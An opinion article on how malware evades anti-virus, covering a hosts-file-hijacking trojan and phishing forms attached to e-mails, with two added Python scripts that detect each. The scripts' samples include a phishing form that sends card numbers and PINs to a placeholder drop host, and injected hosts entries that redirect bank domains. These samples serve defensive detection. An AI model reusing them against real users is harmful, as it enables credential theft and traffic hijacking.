Is malware on the decline, or is evasion on the rise?
Noa Bar Yosef, senior security strategist, Imperva
In February, PandaLabs published a malware findings report indicating that the number of infected clients it observed had decreased in February compared with January.
The data for this research was gathered from the company's anti-virus (AV) tool. On the face of it, this is a surprising finding, as security researchers continuously describe an epidemic of client-side threats and a steady increase in malware and its variants.
Then why this “decrease” in malware?
As hackers become more sophisticated, so, naturally, do their evasion techniques. Much of today's malware is built specifically to bypass security controls such as anti-virus. Moreover, hackers release new variants of client-side threats at a rapid rate, leaving anti-malware tools with the nearly impossible task of keeping their signatures current for all these new and old variants.
Detection evasion techniques have advanced to the point where newly released trojans go undetected by some common AV products for more than a week.
For example, hackers may strip out the common file headers that signatures key on, so that signature-based AV and IPS tools no longer recognise the sample. Other malware is designed to hit its victims so quickly that even when AV eventually detects the threat, the damage has already been done.
Take the re-emergence of what Imperva has dubbed the "Boy in the Browser" (BitB) trojan. This trojan, when executed on the victim's machine, reroutes the victim's traffic through an attacker-controlled server. BitB does this by tampering with the machine's hostname-to-network-address mapping: the local configuration file that resolves a site's name to an address before any DNS lookup is made.
Once this persistent change to the configuration file has been made, the malware removes itself from the victim's machine. As a consequence, even if the user installs the latest AV signatures the next time they switch on the computer, no AV engine will detect the modification: there is no malware left on the machine to detect, only an altered configuration file.
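Because nothing is left to scan, the practical check is to audit the configuration file itself. The script below is an added example, not Imperva's code or part of the original article. It assumes the trojan persists by editing the system hosts file (the usual hostname-to-address "configuration file"); the watch list of sensitive domains and the sample hosts content are constructed for illustration, and the non-local addresses come from the RFC 5737 documentation ranges.

```python
"""Check a hosts file for the kind of tampering described above.

Added example, not Imperva's code or the article's. Assumes the trojan
persists by editing the system hosts file; WATCH_LIST and SAMPLE_HOSTS are
constructed for illustration.
"""
import ipaddress
import re
import sys

# Constructed watch list: hostnames that should never be pinned in a client's
# hosts file. A real deployment would load its own list of sensitive domains.
WATCH_LIST = {"bank.example", "www.bank.example", "login.example.org"}

# Constructed sample hosts file: three benign entries, then injected ones.
SAMPLE_HOSTS = """\
# Default entries
127.0.0.1   localhost
::1         localhost ip6-localhost
0.0.0.0     ads.example   # benign ad-blocking entry

# Entries a BitB-style trojan might add (constructed for this example)
203.0.113.45   www.bank.example bank.example
203.0.113.45   login.example.org
198.51.100.7   updates.example
"""


def parse_hosts(text):
    """Yield (ip, hostname, line_number) for every name in the hosts file,
    ignoring comments and blank lines. One line may carry several names."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = re.split(r"\s+", line)
        for name in fields[1:]:
            yield fields[0], name.lower(), lineno


def is_local_address(ip_text):
    """True for loopback, link-local and unspecified (0.0.0.0 / ::) addresses,
    the only targets a client hosts file legitimately points names at."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # unparsable address: treat as not local
    return ip.is_loopback or ip.is_link_local or ip.is_unspecified


def find_suspicious_entries(text, watch_list=WATCH_LIST):
    """Return findings as dicts. A watch-listed name mapped anywhere (even to
    loopback, which would block the site) is high severity; any other name
    mapped to a routable address is medium severity."""
    findings = []
    for ip, name, lineno in parse_hosts(text):
        if name in watch_list:
            severity = "high"
        elif not is_local_address(ip):
            severity = "medium"
        else:
            continue
        findings.append({"line": lineno, "host": name, "ip": ip,
                         "severity": severity})
    return findings


if __name__ == "__main__":
    # Pass a path (e.g. /etc/hosts) to scan a real file; default is the sample.
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HOSTS
    for f in find_suspicious_entries(source):
        print(f"[{f['severity']}] line {f['line']}: {f['host']} -> {f['ip']}")
```

On Windows the file to pass is `%SystemRoot%\System32\drivers\etc\hosts`. The check is deliberately one-sided: an entry pointing a sensitive name at any address is reported even when the address is loopback, because a hosts file on an end-user machine has no legitimate reason to pin a bank's hostname at all. It does not cover a trojan that instead changes the configured DNS servers, which would need a separate check of the resolver settings.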
Another built-in evasion technique used by hackers is HTML phishing email. Browsers today employ anti-phishing protections; Google's Safe Browsing, for instance, blacklists sites by URL.
That mechanism warns the victim about a malicious site if they decide to click the phishing link. In an HTML phishing campaign, however, there is no embedded link for the warning to trigger on. Instead, the hacker attaches a web-based form to the email itself. No URL is visited until the victim completes the form, at which point the sensitive details are submitted directly to an attacker-controlled server, with nothing for a URL blacklist to check beforehand.
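Since the blacklist never sees the form, the message itself has to be inspected before delivery. The scanner below is an added example, not Imperva's or the article's code: it parses a mail, extracts every `<form>` from its HTML parts, and reports forms that post to a host outside the sender's domain or that collect a password field. The sample message is constructed for illustration, the drop host is an RFC 5737 documentation address, and the "sender domain" test is a heuristic, not a verdict.

```python
"""Flag e-mail HTML parts that carry a credential-harvesting form.

Added example, not Imperva's or the article's code. SAMPLE_EML is constructed;
the drop host 203.0.113.9 is a documentation address.
"""
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: multipart mail whose HTML attachment is a form that
# posts card details straight to an attacker-controlled host.
SAMPLE_EML = """\
From: "Account Team" <support@bank.example>
To: victim@example.com
Subject: Please verify your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please open the attached secure form to confirm your details.

--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="verify.html"

<html><body>
<form action="http://203.0.113.9/collect" method="post">
  Card number: <input name="card"><br>
  PIN: <input type="password" name="pin"><br>
  <input type="submit" value="Verify">
</form>
</body></html>

--b1--
"""


class FormExtractor(HTMLParser):
    """Collect each <form>: its action, method, named inputs, password use."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # value-less attrs become ""
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "inputs": [], "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("name"):
                self._current["inputs"].append(a["name"])
            if a.get("type", "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def sender_domain(msg):
    """Domain of the first From: address, lower-cased ('' if absent)."""
    hdr = msg["From"]
    if hdr is None or not getattr(hdr, "addresses", ()):
        return ""
    return hdr.addresses[0].domain.lower()


def scan_message(raw):
    """Return one finding per suspicious form found in any text/html part."""
    msg = message_from_string(raw, policy=policy.default)
    domain = sender_domain(msg)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        extractor = FormExtractor()
        extractor.feed(part.get_content())
        for form in extractor.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            same_domain = domain and (host == domain or host.endswith("." + domain))
            reasons = []
            if host and not same_domain:
                reasons.append(f"form posts to {host}, not sender domain {domain or '(none)'}")
            if form["has_password"]:
                reasons.append("form collects a password field")
            if reasons:
                findings.append({"part": part.get_filename() or "(inline html)",
                                 "action": form["action"],
                                 "inputs": form["inputs"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_message(SAMPLE_EML):
        print(f"{f['part']}: {f['action']} inputs={f['inputs']}")
        print("  " + "; ".join(f["reasons"]))
```

The From: domain is trivially spoofable, so a form posting to the "right" domain is not proof of legitimacy; the check is most useful in the other direction, where a mismatch or a password input in a mail attachment is a strong signal. A production gateway would also look inside archived or base64-encoded attachments, which this example does not unpack.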
Another method of evading detection is to use multiple vehicles for malware distribution. A recent report has shown that anti-virus tools may flag an executable as malicious when it is distributed in one manner, such as via email,
yet when the same executable is distributed in a different manner, such as via a USB thumb drive, it bypasses the anti-virus controls.
Although anti-virus tools may show a drop in detected malware, in reality client-side malware will simply continue to increase. Furthermore, securing the client's machine has become a Sisyphean task.
Enterprises must stand up, take responsibility and deal with these threats themselves, instead of relying on consumers to secure their own machines.
While providers should still urge consumers to be prudent, they must learn how to transact safely with customers whose machines may already be infected, and create a safe business environment for them regardless of the broader threat. Such measures include identifying account takeover, defeating phishing campaigns, detecting infected clients, handling sessions from compromised clients and even sandboxing client sessions.